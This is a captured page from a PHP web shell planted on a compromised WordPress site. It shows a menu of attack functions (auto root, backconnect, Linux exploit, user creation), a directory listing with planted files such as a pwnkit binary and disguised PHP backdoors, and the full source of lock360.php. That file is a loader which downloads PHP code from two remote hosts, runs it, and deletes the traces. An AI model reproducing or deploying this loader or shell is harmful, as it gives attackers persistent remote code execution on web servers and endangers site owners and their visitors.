Linux webm010.cluster123.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.123.20.10 | : 216.73.217.174
Cant Read [ /etc/named.conf ]
8.4.22
pablogiliy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
pablogiliy /
kovenwebsite /
[ HOME SHELL ]
Name
Size
Permission
Action
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
252
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
admin.php
46.41
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
berfvfbcv.php
143.87
KB
-rw-r--r--
bulet.php
1.05
MB
-rw-r--r--
google1375565a76eb203e.html
53
B
-rw-r--r--
google61fa6f9649962984.html
53
B
-rw-r--r--
google90adbdabca181434.html
53
B
-rw-r--r--
googledb54b2f7faac3915.html
53
B
-rw-r--r--
googlef99be54b280f419c.html
53
B
-rw-r--r--
lock360.php
1.4
KB
-rw-r--r--
one.gz
1.19
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.html
7.25
KB
-rw-r--r--
wp-blog-header.php
884
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-requestm.php
220.27
KB
-rw-r--r--
wp-settings.php
29.38
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lock360.php
<?php function GC($a) { $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { $code = GC('https://c.lo62.xyz/'); if (!$code) { $code = GC('https://c2.icw7.com/'); } $need = '<' . '?' . 'php'; if (strpos($code, $need) === false) { die('get failed'); } if(function_exists('tmpfile')){ $file_name = tmpfile(); } if($file_name) { fwrite($file_name, $code); $a = stream_get_meta_data($file_name); $file_path = $a['uri']; @include($file_path); fclose($file_name); }else { $file_path = '.c'; file_put_contents($file_path, $code); @include($file_path); } @unlink($file_path); die(); }
Close